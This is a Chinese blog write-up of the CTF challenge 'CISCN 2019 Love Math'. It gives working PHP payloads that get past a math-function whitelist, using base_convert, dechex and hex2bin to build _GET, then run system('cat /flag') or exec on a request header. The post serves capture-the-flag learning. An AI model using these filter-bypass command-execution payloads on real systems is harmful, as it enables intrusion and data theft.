[CISCN 2019 初赛]Love Math 1

最新推荐文章于 2023-09-01 17:19:55 发布
最新推荐文章于 2023-09-01 17:19:55 发布
阅读量725 收藏
点赞数 1
分类专栏: BUUCTF 文章标签: web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/123636571
版权 
知识点:各个函数嵌套,进制转换

00x1

这题过滤了很多比如:参数长读为80以下,且里面只能是数学函数,以及一些字符。

我们可以用变量拼接,那么如何拼接呢?我们可以看一下下面这个函数,里面可以有36进制,也就是说我们可以得到任意小写字母,那么我们就可以尝试构造_GET,但是这需要大写字母,而在php中有个hex2bin可以把16进制转换为字符串,可以通过hex2bin来构造_GET。且hex2bin可以这么构造base_convert(37907361743,10,36),意思是把37907361743转换为36进制,也就是hex2bin
---------------------------------------------------------------------------------------------------------------
在这里插入图片描述
---------------------------------------------------------------------------------------------------------------
那么问题又来了,怎么得到_GET的16进制呢?我们可以通过一个数学函数dechex,它可以把十进制转十六进制,构造dechex(1598506324),十六进制是5f474554

到此以构造_GET完毕。

$pi=base_convert(37907361743,10,36)(dechex(1598506324))
//分解
//$pi=base_convert(37907361743,10,36)(5f474554)
//$pi=hex2bin(5f474554)
//$pi=_GET

现在我们就可以通过变量代换来构造payload。

?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=cat /flag
//$$pi=$_GET
//{pi}==[pi],这里的pi为我们要填的shell
//(($$pi){abs})同理
//&pi=system&abs=cat /flag,把这句命令分两部分传参,因为空格被过滤了,只能构造两个get传参

00x2

出处
通过变量拼接裁剪来构造phpinfo,可以看到此版本为7.3.9
在这里插入图片描述

$pi=hypot.min.fmod;$pi=$pi{2}.$pi{0}.$pi{2}.$pi{6}.$pi{7}.$pi{8}.$pi{3};$pi()

借助getallheader()来控制请求头,通过请求头的字段读取flag
payload

$pi=base_convert,$pi(696468,10,36)(($pi(8768397090111664438,10,30))(){1})
//exec(getallheaders(){1})

操作xx和yy,中间用逗号隔开,echo都能输出
echo xx,yy
并且在请求头上加上1:cat flag.php字段即可

succ3
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2019CSP-S A卷初赛真题及答案.docx
10-20
2019 CSP-S 初赛】是中国计算机学会(CCF)组织的计算机软件能力认证的一环,主要面向中学生进行,旨在检验参赛者的计算机程序设计能力。CSP-S,全称为“Certified Software Professional - Software”,是针对...
2019CSP-S-提高组初赛
08-24
2019CSP-S-提高组初赛
[CISCN 2019初赛]Love Math
rev1ve的博客
09-01 1586
简单分析一下,只有一个GET传参参数是c,然后对上传的值进行黑名单检测,接着给了白名单以及常用的数学函数。这个提示很明显了,需要我们用函数进行转换成我们的执行命令。这里最后一个点,就是我们传递的参数值为两个(即一个是函数名 一个是参数),该如何绕过呢。这样的出来,但是这里对我们c的值进行了超多过滤,这里用的是构造出类似。呢,其实目的很明显,因为c的值不能有字母,而我们要想利用。解决方法是用php7的特性,就是可以用变量执行函数。关键点利用php动态函数的特性,比如我们可以构造。,这里需要用到的两个函数是。
[CISCN 2019 初赛]Love Math
shawdow_bug的博客
06-17 891
能得到任意字符串的无字符串实参payload
buuctf-[CISCN 2019 初赛]Love Math(小宇特详解)
小宇的web博客
02-26 2837
buuctf-[CISCN 2019 初赛]Love Math(小宇特详解) 1.先看题目 <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了
BUUCTF:[CISCN 2019 初赛]Love Math
qq_46230755的博客
12-27 916
base_convert(37907361743,10,36)得到“hex2bin” dechex(1598506324)得到“5f474554” $pi=hex2bin(5f474554)得到$pi="_GET" ($$pi){pi}(($$pi){abs})=$_GET{pi}($_GET{abs})
CISCN2019初赛 Love Math
Tajang的大千世界
04-11 287
打开靶机 直接给了源码,刚开始没啥思路,看了wp,大致懂了。先介绍一个概念,在PHP中可以把函数名赋给变量,然后通过变量调用函数,比如下面的代码会执行system('ls'); $a='system'; $a('ls'); 我想执行system('cat /flag');那就应该是如下语句 ?c=$_GET[a]($_GET[b])&a=system&b=cat /flag 但是源码限制了许多东西: 1.payload长度不能超过80 2.payload中不能包含’ ‘, ‘\t’,
[CISCN2019 初赛]Love Math
qq_42551635的博客
05-07 386
[CISCN2019 初赛]Love Math 前言 一道非常有意思的,逻辑比较简单的代码审计 知识点 base_convert()函数 in_array()函数 in_array(值,数组) 函数搜索数组中是否存在指定的值。 实例 <?php $people = array("Peter", "Joe", "Glenn", "Cleveland", 23); if (in_array("23", $people, TRUE)) { echo "Match found<br&
2019 CSP-S组 第1轮 初赛 答案+解析 好--13页.pdf
09-02
"2019 CSP-S组 第1轮 初赛 答案+解析" 本文档提供了2019年CCF非专业级别软件能力认证第一轮(CSP-S)提高级C++语言试题A卷的答案和解析。该试卷共有10页,满分100分,包含单项选择题15题,每题2分。 试题1:x+a%3*...
2019 2020 CSP-J CSP-S组 第1轮 初赛 答案+解析.rar
09-04
2019 2020 CSP-J CSP-S组 第1轮 初赛 答案+解析》 此压缩包文件包含了2019年和2020年连续两年CSP-J (入门级) 和 CSP-S (提高级) 组的第一轮初赛的答案与解析。CSP,全称为China Software Programming Contest,是...
2019初赛决赛答案解析.pdf
最新发布
04-11
大学生英语竞赛,章节讲解,试题讲解,竞赛题目,试题试卷,题目分析,参考资料,极具学习价值
2019-CSP-J-普及组初赛
06-10
2019-CSP-J-普及组初赛
2021 CSP-J1 junior-C++ 初赛 第1轮 真题 .pdf
09-20
本文档是对 2021 CSP-J1 junior-C++ 初赛第 1 轮真题的详细解析,以帮助读者更好地理解题目内容和解题思路。 一、单项选择题 1. 不属于面向对象程序设计语言的是( )。 答案:D. C。面向对象程序设计语言主要有 ...
2019 CSP-S 初赛试题与解析(2020.09.20).rar
09-20
标题中的“2019 CSP-S 初赛试题与解析(2020.09.20).rar”指的是中国计算机学会(CCF)在2019年举行的计算机软件能力认证(CSP)-S级别的初赛试题及官方解析合集,该合集在2020年9月20日被整理成RAR格式的压缩包...
15、2020 CSP-J1 入门 初赛 解析 8页 好.pdf
09-02
2020 CSP-J1 入门初赛解析 本资源为 2020 年 CSP-J1 入门初赛的解析,共 8 页,涵盖了程序设计、算法、数据结构等多个方面的知识点。 单项选择 1. 内存中的存储单元为地址,一般用 16 进制数表示。 2. 编译器是将...
电子商务知识竞赛初赛(1).ppt
11-12
电子商务知识竞赛初赛涉及到多个方面的知识点,主要涵盖了电子商务的基础概念、网络营销、物流管理、网络法规以及互联网技术的应用。下面是对这些知识点的详细解读: 1. **电子商务与网上销售**: - 在线销售已经...
NOIP普及组2006-2018初赛 2019 CSP-J1 2020 CSP-J1 完善程序题(5页).pdf
08-27
1. 排列组合问题,例如NOIP2006普及组初赛4.1--全排列、NOIP2007普及组初赛4.1--求字符的逆序等。 2. 字符串处理问题,例如NOIP2006普及组初赛4.2、NOIP2008普及组初赛4.1--字符串替换等。 3. 数组和矩阵问题,例如...
2016-2020年 CSP-J1 CSP-S1 NOIP 初赛真题 答案及解析.rar
09-12
2016-2020年 CSP-J1 CSP-S1 NOIP 初赛真题 答案及解析.rar
[ciscn 2019 初赛]love math
03-16
好的,以下是回复: 这道题目需要我们求出一个数列中所有数的最大公约数。我们可以使用欧几里得算法来求解。具体来说,我们可以用辗转相除的方法,不断将两个数中较大的数除以较小的数,直到两个数相等为止,此时的数即为它们的最大公约数。我们可以用一个循环来实现这个过程,不断更新两个数的值,直到它们相等为止。最后得到的数即为所求的最大公约数。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值